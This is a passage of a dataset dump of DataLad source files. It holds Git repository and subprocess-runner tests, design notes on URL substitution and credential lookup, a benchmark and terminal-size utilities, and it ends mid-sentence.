sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = GitRepo(path1).init()\n assert_is_instance(repo2, GitRepo)\n\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in a different way:\n with chpwd(path1):\n repo3 = GitRepo(op.relpath(path1, start=path2))\n\n # it's the same object:\n ok_(repo1 is repo3)\n\n # and realpath attribute is the same, so they are still equal:\n ok_(repo1 == repo3)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n gc.collect() # TODO: see first comment above\n del repo1\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n # re-requesting still delivers the same thing:\n repo1 = GitRepo(path1)\n assert_equal(orig_id, id(repo1))\n\n # killing all references should result in the instance being gc'd and\n # re-request yields a new object:\n del repo1\n del repo2\n\n # Killing last reference will lead to garbage collection which will call\n # GitRepo's finalizer:\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: GitRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n\n # Flyweight is gone:\n assert_not_in(path1, GitRepo._unique_instances.keys())\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)])\n\n # new object is created on re-request:\n repo1 = GitRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)]))\n\n\n@with_tree({\"foo\": \"foo\", \"bar\": \"bar\"})\ndef test_gitrepo_call_git_methods(path=None):\n gr = GitRepo(path).init()\n gr.call_git(['add', \"foo\", \"bar\"])\n gr.call_git(['commit', '-m', \"foobar\"])\n gr.call_git([\"mv\"], files=[\"foo\", \"foo.txt\"])\n ok_((gr.pathobj / 'foo.txt').exists())\n\n for expect_fail, check in [(False, assert_in),\n (True, assert_not_in)]:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with assert_raises(CommandError):\n gr.call_git([\"mv\"], files=[\"notthere\", \"dest\"],\n expect_fail=expect_fail)\n check(\"fatal: bad source\", cml.out)\n\n eq_(list(gr.call_git_items_([\"ls-files\"], read_only=True)),\n [\"bar\", \"foo.txt\"])\n eq_(list(gr.call_git_items_([\"ls-files\", \"-z\"], sep=\"\\0\", read_only=True)),\n # Note: The custom separator has trailing empty item, but this is an\n # arbitrary command with unknown output it isn't safe to trim it.\n [\"bar\", \"foo.txt\"])\n\n with assert_raises(AssertionError):\n gr.call_git_oneline([\"ls-files\"], read_only=True)\n\n eq_(gr.call_git_oneline([\"ls-files\"], files=[\"bar\"], read_only=True),\n \"bar\")\n\n ok_(gr.call_git_success([\"rev-parse\", \"HEAD^{commit}\"], read_only=True))\n with swallow_logs(new_level=logging.DEBUG) as cml:\n assert_false(gr.call_git_success([\"rev-parse\", \"HEAD^{blob}\"],\n read_only=True))\n assert_not_in(\"expected blob type\", cml.out)\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_fake_dates(path=None):\n raise SkipTest(\"Core GitRepo class does not have format_commit() yet\")\n\n gr = GitRepo(path).init()\n gr.cfg.set('datalad.fake-dates', 'true')\n\n gr.call_git(['add', \"foo\"])\n gr.call_git(['commit', '-m', 'some', \"foo\"])\n\n seconds_initial = gr.cfg.obtain(\"datalad.fake-dates-start\")\n\n # First commit is incremented by 1 second.\n eq_(seconds_initial + 1,\n int(gr.format_commit('%at')))\n\n # The second commit by 2.\n gr.call_git(['add', \"bar\"])\n gr.call_git(['commit', '-m', 'some', \"bar\"])\n eq_(seconds_initial + 2,\n int(gr.format_commit('%at')))\n\n # If we checkout another branch, its time is still based on the latest\n # timestamp in any local branch.\n gr.call_git(['checkout', \"--orphan\", 'other'])\n with open(op.join(path, \"baz\"), \"w\") as ofh:\n ofh.write(\"baz content\")\n gr.call_git(['add', \"baz\"])\n gr.call_git(['commit', '-m', 'some', \"baz\"])\n eq_(gr.get_active_branch(), \"other\")\n eq_(seconds_initial + 3,\n int(gr.format_commit('%at')))\n\n\n@with_tempfile(mkdir=True)\n@with_tree(tree={\".git\": {}})\n@with_tree(tree={\"HEAD\": \"\",\n \"config\": \"\"})\n@with_tree(tree={\".git\": \"gitdir: subdir\"})\ndef test_get_dot_git(emptycase=None, gitdircase=None, barecase=None, gitfilecase=None):\n emptycase = Path(emptycase)\n gitdircase = Path(gitdircase)\n barecase = Path(barecase)\n gitfilecase = Path(gitfilecase)\n\n # the test is not actually testing resolving (we can trust that)\n # but it is exercising the internal code paths involved in it\n for r in (True, False):\n assert_raises(RuntimeError, _get_dot_git, emptycase, resolved=r)\n eq_(_get_dot_git(emptycase, ok_missing=True, resolved=r),\n emptycase / '.git')\n\n eq_(_get_dot_git(gitdircase, resolved=r),\n (gitdircase.resolve() if r else gitdircase) / '.git')\n\n eq_(_get_dot_git(barecase, resolved=r),\n barecase.resolve() if r else barecase)\n\n eq_(_get_dot_git(gitfilecase, resolved=r),\n (gitfilecase.resolve() if r else gitfilecase) / 'subdir')\n\n\nfile1_content = \"file1 content\\n\"\nfile2_content = \"file2 content\\0\"\nexample_tree = {\n \"file1\": file1_content,\n \"file2\": file2_content\n}\n\n\ndef _create_test_gitrepo(temp_dir):\n repo = GitRepo(temp_dir)\n repo.init()\n repo.call_git([\"add\", \".\"])\n repo.call_git([\"commit\", \"-m\", \"test commit\"])\n\n hash_keys = tuple(\n repo.call_git([\"hash-object\", file_name]).strip()\n for file_name in (\"file1\", \"file2\")\n )\n return repo, hash_keys\n\n\n@with_tree(tree=example_tree)\ndef test_call_git_items(temp_dir=None):\n # check proper handling of separator in call_git_items_\n repo, (hash1, hash2) = _create_test_gitrepo(temp_dir)\n\n expected_tree_lines = (\n f'100644 blob {hash1}\\tfile1',\n f'100644 blob {hash2}\\tfile2'\n )\n\n assert_equal(\n expected_tree_lines,\n tuple(repo.call_git_items_([\"ls-tree\", \"HEAD\"]))\n )\n\n assert_equal(\n expected_tree_lines,\n tuple(repo.call_git_items_([\"ls-tree\", \"-z\", \"HEAD\"], sep=\"\\0\"))\n )\n\n\n@with_tree(tree=example_tree)\ndef test_call_git_call_git_items_identity(temp_dir=None):\n # Ensure that git_call() and \"\".join(call_git_items_(..., keep_ends=True))\n # yield the same result and that the result is identical to the file content\n\n repo, hash_keys = _create_test_gitrepo(temp_dir)\n args = [\"cat-file\", \"-p\"]\n for hash_key, content in zip(hash_keys, (file1_content, file2_content)):\n r_item = \"\".join(repo.call_git_items_(args + [hash_key], keep_ends=True))\n r_no_item = repo.call_git(args, [hash_key])\n assert_equal(r_item, r_no_item)\n assert_equal(r_item, content)\n" }, { "alpha_fraction": 0.7586900591850281, "alphanum_fraction": 0.7647227644920349, "avg_line_length": 43.063289642333984, "blob_id": "63b5b230c7d95d265d2fa2fae65ebccedbbae48c", "content_id": "17ec10618745d3d6acaa276beb882233e89fdfe6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3481, "license_type": "permissive", "max_line_length": 85, "num_lines": 79, "path": "/docs/source/design/url_substitution.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_url_substitution:\n\n****************\nURL substitution\n****************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation. This implementation\n is covering URL substitution in ``clone`` only. A further extension to\n URL processing elsewhere is possible.\n\nURL substitution is a transformation of a given URL using a set of\nspecifications. Such specification can be provided as configuration settings\n(via all supported configuration sources). These configuration items must\nfollow the naming scheme ``datalad.clone.url-substitute.<label>``, where\n``<label>`` is an arbitrary identifier.\n\nA substitution specification is a string with a match and substitution\nexpression, each following Python's regular expression syntax. Both\nexpressions are concatenated into a single string with an arbitrary delimiter\ncharacter. The delimiter is defined by prefixing the string with the delimiter.\nPrefix and delimiter are stripped from the expressions before processing.\nExample::\n\n ,^http://(.*)$,https://\\\\1\n\nA particular configuration item can be defined multiple times (see examples\nbelow) to form a substitution series. Substitutions in the same series will be\napplied incrementally, in order of their definition. If the first substitution\nexpression does not match, the entire series will be ignored. However,\nfollowing a first positive match all further substitutions in a series are\nprocessed, regardless whether intermediate expressions match or not.\n\nAny number of substitution series can be configured. They will be considered in\nno particular order. Consequently, it advisable to implement the first match\nspecification of any series as specific as possible, in order to prevent\nundesired transformations.\n\n\nExamples\n========\n\nChange the protocol component of a given URL in order to hand over further\nprocessing to a dedicated Git remote helper. Specifically, the following\nexample converts Open Science Framework project URLs like\n``https://osf.io/f5j3e/`` into ``osf://f5j3e``, a URL that can be handle by\n``git-remote-osf``, the Git remote helper provided by the `datalad-osf\nextension package <https://github.com/datalad/datalad-osf>`__::\n\n datalad.clone.url-substitute.osf = ,^https://osf.io/([^/]+)[/]*$,osf://\\1\n\nHere is a more complex examples with a series of substitutions. The first\nexpression ensures that only GitHub URLs are being processed. The associated\nsubstitution disassembles the URL into its two only relevant components,\nthe organisation/user name, and the project name::\n\n datalad.clone.url-substitute.github = ,https?://github.com/([^/]+)/(.*)$,\\1###\\2\n\nAll other expressions in this series that are described below will only be considered\nif the above expression matched.\n\nThe next two expressions in the series normalize URL components that maybe be\nauto-generated by some DataLad functionality, e.g. subdataset location\ncandidate generation from directory names::\n\n # replace (back)slashes with a single dash\n datalad.clone.url-substitute.github = ,[/\\\\]+,-\n\n # replace with whitespace (URL-quoted or not) with a single underscore\n datalad.clone.url-substitute.github = ,\\s+|(%2520)+|(%20)+,_\n\nThe final expression in the series is recombining the organization/user name\nand project name components back into a complete URL::\n\n datalad.clone.url-substitute.github = ,([^#]+)###(.*),https://github.com/\\1/\\2\n" }, { "alpha_fraction": 0.580146312713623, "alphanum_fraction": 0.5867642164230347, "avg_line_length": 29.607675552368164, "blob_id": "b052619e6b0973afa431764f8ed84c871b386f59", "content_id": "6e0e5a2d6057abf9825dfb0af7c5a00a602012bd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14360, "license_type": "permissive", "max_line_length": 114, "num_lines": 469, "path": "/datalad/runner/tests/test_witless_runner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test WitlessRunner\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport signal\nimport sys\nimport unittest.mock\nfrom threading import (\n Lock,\n Thread,\n)\nfrom time import (\n sleep,\n time,\n)\nfrom typing import Any\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n assert_in,\n assert_raises,\n eq_,\n integration,\n ok_,\n ok_file_has_content,\n skip_if_on_windows,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n CMD_MAX_ARG,\n Path,\n on_windows,\n)\n\nfrom .. import (\n CommandError,\n KillOutput,\n Protocol,\n Runner,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom .utils import py2cmd\n\nresult_counter = 0\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_runner(tempfile: str = \"\") -> None:\n runner = Runner()\n content = 'Testing real run' if on_windows else 'Testing äöü東 real run'\n cmd = 'echo %s > %s' % (content, tempfile)\n res = runner.run(cmd)\n assert isinstance(res, dict)\n # no capture of any kind, by default\n ok_(not res['stdout'])\n ok_(not res['stderr'])\n ok_file_has_content(tempfile, content, strip=True)\n os.unlink(tempfile)\n\n\ndef test_runner_stderr_capture() -> None:\n runner = Runner()\n test_msg = \"stderr-Message\"\n res = runner.run(py2cmd(\n 'import sys; print(%r, file=sys.stderr)' % test_msg),\n protocol=StdOutErrCapture,\n )\n assert isinstance(res, dict)\n eq_(res['stderr'].rstrip(), test_msg)\n ok_(not res['stdout'])\n\n\ndef test_runner_stdout_capture() -> None:\n runner = Runner()\n test_msg = \"stdout-Message\"\n res = runner.run(py2cmd(\n 'import sys; print(%r, file=sys.stdout)' % test_msg),\n protocol=StdOutErrCapture,\n )\n assert isinstance(res, dict)\n eq_(res['stdout'].rstrip(), test_msg)\n ok_(not res['stderr'])\n\n\ndef test_runner_failure() -> None:\n runner = Runner()\n with assert_raises(CommandError) as cme:\n runner.run(\n py2cmd('import sys; sys.exit(53)')\n )\n eq_(53, cme.value.code)\n\n # but we bubble up FileNotFoundError if executable does not exist at all\n with assert_raises(FileNotFoundError) as cme:\n runner.run(['dne1l2k3j4']) # be damned the one who makes such a command\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_fix_PWD(path: str = \"\") -> None:\n env = os.environ.copy()\n env['PWD'] = orig_cwd = os.getcwd()\n runner = Runner(cwd=path, env=env)\n res = runner.run(\n py2cmd('import os; print(os.environ[\"PWD\"])'),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n eq_(res['stdout'].strip(), path) # was fixed up to point to point to cwd's path\n eq_(env['PWD'], orig_cwd) # no side-effect\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_cwd_encoding(path: str = \"\") -> None:\n env = os.environ.copy()\n # Add PWD to env so that runner will temporarily adjust it to point to cwd.\n env['PWD'] = os.getcwd()\n cwd = Path(path) / OBSCURE_FILENAME\n cwd.mkdir()\n # Running doesn't fail if cwd or env has unicode value.\n Runner(cwd=cwd, env=env).run(\n py2cmd(\n 'from pathlib import Path; (Path.cwd() / \"foo\").write_text(\"t\")'))\n (cwd / 'foo').exists()\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_stdin(path: str = \"\") -> None:\n runner = Runner()\n fakestdin = Path(path) / 'io'\n # go for difficult content\n fakestdin.write_text(OBSCURE_FILENAME)\n\n res = runner.run(\n py2cmd('import fileinput; print(fileinput.input().readline())'),\n stdin=fakestdin.open(),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n assert_in(OBSCURE_FILENAME, res['stdout'])\n\n # we can do the same without a tempfile, too\n res = runner.run(\n py2cmd('import fileinput; print(fileinput.input().readline())'),\n stdin=OBSCURE_FILENAME.encode('utf-8'),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n assert_in(OBSCURE_FILENAME, res['stdout'])\n\n\[email protected]_slow(3)\ndef test_runner_stdin_no_capture() -> None:\n # Ensure that stdin writing alone progresses\n runner = Runner()\n runner.run(\n py2cmd('import sys; print(sys.stdin.read()[-10:])'),\n stdin=('ABCDEFGHIJKLMNOPQRSTUVWXYZ-' * 2 + '\\n').encode('utf-8'),\n protocol=None\n )\n\n\[email protected]_slow(3)\ndef test_runner_no_stdin_no_capture() -> None:\n # Ensure a runner without stdin data and output capture progresses\n runner = Runner()\n runner.run(\n ([\"cmd.exe\", \"/c\"] if on_windows else []) + [\"echo\", \"a\", \"b\", \"c\"],\n stdin=None,\n protocol=None\n )\n\n\[email protected]_slow(3)\ndef test_runner_empty_stdin() -> None:\n # Ensure a runner without stdin data and output capture progresses\n runner = Runner()\n runner.run(\n py2cmd('import sys; print(sys.stdin.read())'),\n stdin=b\"\",\n protocol=None\n )\n\n\ndef test_runner_parametrized_protocol() -> None:\n runner = Runner()\n\n # protocol returns a given value whatever it receives\n class ProtocolInt(StdOutCapture):\n def __init__(self, value: bytes) -> None:\n self.value = value\n super().__init__()\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n super().pipe_data_received(fd, self.value)\n\n res = runner.run(\n py2cmd('print(1, end=\"\")'),\n protocol=ProtocolInt,\n # value passed to protocol constructor\n value=b'5',\n )\n assert isinstance(res, dict)\n eq_(res['stdout'], '5')\n\n\n@integration # ~3 sec\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_asyncio_loop_noninterference1(path1: str = \"\", path2: str = \"\") -> None:\n if on_windows and sys.version_info < (3, 8):\n raise SkipTest(\n \"get_event_loop() raises \"\n \"RuntimeError: There is no current event loop in thread 'MainThread'.\")\n # minimalistic use case provided by Dorota\n import datalad.api as dl\n src = dl.create(path1) # type: ignore[attr-defined]\n reproducer = src.pathobj/ \"reproducer.py\"\n reproducer.write_text(f\"\"\"\\\nimport asyncio\nasyncio.get_event_loop()\nimport datalad.api as datalad\nds = datalad.clone(path=r'{path2}', source=r\"{path1}\")\nloop = asyncio.get_event_loop()\nassert loop\n# simulate outside process closing the loop\nloop.close()\n# and us still doing ok\nds.status()\n\"\"\")\n Runner().run([sys.executable, str(reproducer)]) # if Error -- the test failed\n\n\n@with_tempfile\ndef test_asyncio_forked(temp_: str = \"\") -> None:\n # temp will be used to communicate from child either it succeeded or not\n temp = Path(temp_)\n runner = Runner()\n try:\n pid = os.fork()\n except BaseException as exc:\n # .fork availability is \"Unix\", and there are cases where it is \"not supported\"\n # so we will just skip if no forking is possible\n raise SkipTest(f\"Cannot fork: {exc}\")\n # if does not fail (in original or in a fork) -- we are good\n if sys.version_info < (3, 8) and pid != 0:\n # for some reason it is crucial to sleep a little (but 0.001 is not enough)\n # in the master process with older pythons or it takes forever to make the child run\n sleep(0.1)\n try:\n runner.run([sys.executable, '--version'], protocol=StdOutCapture)\n if pid == 0:\n temp.write_text(\"I rule\")\n except:\n if pid == 0:\n temp.write_text(\"I suck\")\n if pid != 0:\n # parent: look after the child\n t0 = time()\n try:\n while not temp.exists() or temp.stat().st_size < 6:\n if time() - t0 > 5:\n raise AssertionError(\"Child process did not create a file we expected!\")\n finally:\n # kill the child\n os.kill(pid, signal.SIGTERM)\n # see if it was a good one\n eq_(temp.read_text(), \"I rule\")\n else:\n # sleep enough so parent just kills me the kid before I continue doing bad deeds\n sleep(10)\n\n\ndef test_done_deprecation() -> None:\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = Protocol(\"done\")\n warn_mock.assert_called_once()\n\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = Protocol()\n warn_mock.assert_not_called()\n\n\ndef test_faulty_poll_detection() -> None:\n popen_mock = unittest.mock.MagicMock(**{\"pid\": 666, \"poll.return_value\": None})\n protocol = Protocol()\n protocol.process = popen_mock\n assert_raises(CommandError, protocol._prepare_result)\n\n\ndef test_kill_output() -> None:\n runner = Runner()\n res = runner.run(\n py2cmd('import sys; sys.stdout.write(\"aaaa\\\\n\"); sys.stderr.write(\"bbbb\\\\n\")'),\n protocol=KillOutput)\n assert isinstance(res, dict)\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n\n\n@skip_if_on_windows # no \"hint\" on windows since no ulimit command there\ndef test_too_long() -> None:\n with swallow_logs(new_level=logging.ERROR) as cml:\n with assert_raises(OSError): # we still raise an exception if we exceed too much\n Runner().run(\n [sys.executable, '-c', 'import sys; print(len(sys.argv))'] + [str(i) for i in range(CMD_MAX_ARG)],\n protocol=StdOutCapture\n )\n cml.assert_logged('.*use.*ulimit.*')\n\n\ndef test_path_to_str_conversion() -> None:\n # Regression test to ensure that Path-objects are converted into strings\n # before they are put into the environment variable `$PWD`\n runner = Runner()\n test_path = Path(\"a/b/c\")\n adjusted_env = runner._get_adjusted_env(\n cwd=test_path,\n env=dict(some_key=\"value\")\n )\n assert adjusted_env is not None\n assert str(test_path) == adjusted_env['PWD']\n\n\ndef test_env_copying() -> None:\n # Regression test to ensure environments are only copied\n # if `copy=True` is given to `Runner._get_adjusted_env.`\n # Test also for path adjustments, if not-`None` `pwd`-value\n # is given to `Runner._get_adjusted_env`.\n runner = Runner()\n for original_env in (None, dict(some_key='value')):\n for cwd in (None, Path('a/b/c')):\n for do_copy in (True, False):\n adjusted_env = runner._get_adjusted_env(\n cwd=cwd,\n env=original_env,\n copy=do_copy\n )\n if original_env is None:\n assert adjusted_env is None\n else:\n assert adjusted_env is not None\n if do_copy is True:\n assert adjusted_env is not original_env\n else:\n assert adjusted_env is original_env\n if cwd is None:\n assert 'PWD' not in adjusted_env\n else:\n assert 'PWD' in adjusted_env\n\n\n@with_tempfile(mkdir=True)\ndef test_environment(temp_dir_path: str = \"\") -> None:\n # Ensure that the subprocess sees a string in `$PWD`, even if a Path-object\n # is provided to `cwd`.\n cmd = py2cmd(\"import os; print(os.environ['PWD'])\")\n cwd = Path(temp_dir_path)\n env = dict(SYSTEMROOT=os.environ.get('SYSTEMROOT', ''))\n runner = Runner()\n results = runner.run(cmd=cmd, protocol=StdOutCapture, cwd=cwd, env=env)\n assert isinstance(results, dict)\n output = results['stdout'].splitlines()[0]\n assert output == temp_dir_path\n\n runner = Runner(cwd=cwd, env=env)\n results = runner.run(cmd=cmd, protocol=StdOutCapture)\n assert isinstance(results, dict)\n output = results['stdout'].splitlines()[0]\n assert output == temp_dir_path\n\n\ndef test_argument_priority() -> None:\n class X:\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n self.args = args\n self.kwargs = kwargs\n\n def run(self) -> dict:\n return dict(\n code=0,\n args=self.args,\n kwargs=self.kwargs,\n )\n\n test_path_1 = \"a/b/c\"\n test_env_1 = dict(source=\"constructor\")\n test_path_2 = \"d/e/f\"\n test_env_2 = dict(source=\"run-method\")\n\n with unittest.mock.patch('datalad.runner.runner.ThreadedRunner') as tr_mock:\n\n tr_mock.side_effect = X\n runner = Runner(cwd=test_path_1, env=test_env_1)\n\n result = runner.run(\"first-command\")\n assert isinstance(result, dict)\n assert result['kwargs']['cwd'] == test_path_1\n assert result['kwargs']['env'] == {\n **test_env_1,\n 'PWD': test_path_1\n }\n\n result = runner.run(\"second-command\", cwd=test_path_2, env=test_env_2)\n assert isinstance(result, dict)\n assert result['kwargs']['cwd'] == test_path_2\n assert result['kwargs']['env'] == {\n **test_env_2,\n 'PWD': test_path_2\n }\n\n\ndef test_concurrent_execution() -> None:\n runner = Runner()\n caller_threads = []\n\n result_list: list[str] = []\n result_list_lock = Lock()\n\n def target(count: int, r_list: list[str], r_list_lock: Lock) -> None:\n result = runner.run(\n py2cmd(\n \"import time;\"\n \"import sys;\"\n \"time.sleep(1);\"\n \"print('end', sys.argv[1])\",\n str(count)\n ),\n protocol=StdOutCapture,\n )\n assert isinstance(result, dict)\n output = result[\"stdout\"].strip()\n assert output == f\"end {str(count)}\"\n with r_list_lock:\n r_list.append(output)\n\n for c in range(100):\n caller_thread = Thread(\n target=target,\n kwargs=dict(\n count=c,\n r_list=result_list,\n r_list_lock=result_list_lock,\n ))\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n assert len(result_list) == 100\n" }, { "alpha_fraction": 0.6141199469566345, "alphanum_fraction": 0.6170212626457214, "avg_line_length": 31.3125, "blob_id": "a979fd051011ab3e60876c32a961e2fafb2e549e", "content_id": "a2df8a0590a1fd468d95051e2e08b4af3ef40f94", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2068, "license_type": "permissive", "max_line_length": 87, "num_lines": 64, "path": "/benchmarks/plugins/addurls.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Import functions to be tested with _ suffix and name the suite after the\n# original function so we could easily benchmark it e.g. by\n# asv run --python=same -b get_parent_paths\n# without need to discover what benchmark to use etc\n\nimport os\nfrom pathlib import Path, PurePosixPath\nimport datalad.api as dl\n\nfrom ..common import SuprocBenchmarks\n\nimport tempfile\nfrom datalad.utils import get_tempfile_kwargs, rmtree\n\nfrom datalad import lgr\n\n\nclass addurls1(SuprocBenchmarks):\n\n # Try with excluding autometa and not\n params = [None, '*']\n param_names = ['exclude_metadata']\n\n\n def setup(self, exclude_metadata):\n self.nfiles = 20\n self.temp = Path(\n tempfile.mkdtemp(\n **get_tempfile_kwargs({}, prefix='bm_addurls1')))\n\n self.ds = dl.create(self.temp / \"ds\")\n self.ds.config.set('annex.security.allowed-url-schemes', 'file', scope='local')\n\n # populate list.csv and files\n srcpath = PurePosixPath(self.temp)\n\n rows = [\"url,filename,bogus1,bogus2\"]\n for i in range(self.nfiles):\n (self.temp / str(i)).write_text(str(i))\n rows.append(\n \"file://{}/{},{},pocus,focus\"\n .format(srcpath, i, i)\n )\n\n self.listfile = self.temp / \"list.csv\"\n self.listfile.write_text(os.linesep.join(rows))\n\n def teardown(self, exclude_metadata):\n # would make no sense if doesn't work correctly\n # IIRC we cannot provide custom additional depends so cannot import nose\n # assert_repo_status(self.ds.path)\n status = self.ds.status()\n assert all(r['state'] == 'clean' for r in status)\n assert len(status) >= self.nfiles\n rmtree(self.temp)\n\n def time_addurls(self, exclude_autometa):\n lgr.warning(\"CSV: \" + self.listfile.read_text())\n ret = dl.addurls(\n str(self.listfile), '{url}', '{filename}',\n dataset=self.ds,\n exclude_autometa=exclude_autometa\n )\n assert not any(r['status'] == 'error' for r in ret)\n" }, { "alpha_fraction": 0.5044247508049011, "alphanum_fraction": 0.5292878150939941, "avg_line_length": 30.236841201782227, "blob_id": "b739db2473c061e0f98cc39acb69019060bfd0a6", "content_id": "2e64c2321d31cb5cbd68e62a7d9d56c2019ab41b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2373, "license_type": "permissive", "max_line_length": 91, "num_lines": 76, "path": "/datalad/ui/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various utils oriented to UI\"\"\"\n\nfrom datalad.support import ansi_colors\nfrom datalad.utils import on_windows\nimport struct\n\n\n# origin http://stackoverflow.com/a/3010495/1265472\ndef get_terminal_size():\n \"\"\"Return current terminal size\"\"\"\n if on_windows:\n try:\n from ctypes import windll, create_string_buffer\n\n # stdin handle is -10\n # stdout handle is -11\n # stderr handle is -12\n\n h = windll.kernel32.GetStdHandle(-12)\n csbi = create_string_buffer(22)\n res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)\n except:\n return None, None\n if res:\n (bufx, bufy, curx, cury, wattr,\n left, top, right, bottom, maxx, maxy) = struct.unpack(\"hhhhHhhhhhh\", csbi.raw)\n sizex = right - left + 1\n sizey = bottom - top + 1\n return sizex, sizey\n else:\n return None, None\n else:\n import fcntl\n import termios\n try:\n h, w, hp, wp = struct.unpack(\n 'HHHH',\n fcntl.ioctl(0, termios.TIOCGWINSZ,\n struct.pack('HHHH', 0, 0, 0, 0))\n )\n return w, h\n except:\n return None, None\n\n\ndef get_console_width(default_min=20):\n \"\"\"Return console width to use\n\n In some cases shutil reports it to be 0, so we cannot rely on it\n alone\n \"\"\"\n console_width = get_terminal_size()[0] or 0\n # it might still be 0, e.g. in conda builds for 0.10.0\n if console_width <= 0:\n console_width = 80\n elif console_width <= 20:\n # or some other too small to be real number,\n # to prevent crashes below guarantee that it is at least 20\n console_width = 20\n return console_width\n\n\ndef show_hint(msg):\n from datalad.ui import ui\n ui.message(\"{}\".format(\n ansi_colors.color_word(\n msg,\n ansi_colors.YELLOW)))" }, { "alpha_fraction": 0.7818130850791931, "alphanum_fraction": 0.7829391956329346, "avg_line_length": 76.21739196777344, "blob_id": "44a68687b926e74a3fdc46a2e9b0c27cccb165ce", "content_id": "58ea561fa56cdf6276e7c37c12c36a71df143c1a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7104, "license_type": "permissive", "max_line_length": 277, "num_lines": 92, "path": "/docs/source/design/credentials.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_credentials:\n\n*********************\nCredential management\n*********************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nVarious components of DataLad need to be passed credentials to interact with services that require authentication. \nThis includes downloading files, but also things like REST API usage or authenticated cloning.\nKey components of DataLad's credential management are credentials types, providers, authenticators and downloaders.\n\nCredentials\n===========\n\nSupported credential types include basic user/password combinations, access tokens, and a range of tailored solutions for particular services.\nAll credential type implementations are derived from a common :class:`Credential` base class.\nA mapping from string labels to credential classes is defined in ``datalad.downloaders.CREDENTIAL_TYPES``.\n\nImportantly, credentials must be identified by a name.\nThis name is a label that is often hard-coded in the program code of DataLad, any of its extensions, or specified in a dataset or in provider configurations (see below).\n\nGiven a credential ``name``, one or more credential ``component``\\(s) (e.g., ``token``, ``username``, or ``password``) can be looked up by DataLad in at least two different locations.\nThese locations are tried in the following order, and the first successful lookup yields the final value.\n\n1. A configuration item ``datalad.credential.<name>.<component>``.\n Such configuration items can be defined in any location supported by DataLad's configuration system.\n As with any other specification of configuration items, environment variables can be used to set or override credentials.\n Variable names take the form of ``DATALAD_CREDENTIAL_<NAME>_<COMPONENT>``, and standard replacement rules into configuration variable names apply.\n\n2. DataLad uses the `keyring` package https://pypi.org/project/keyring to connect to any of its supported back-ends for setting or getting credentials,\n via a wrapper in 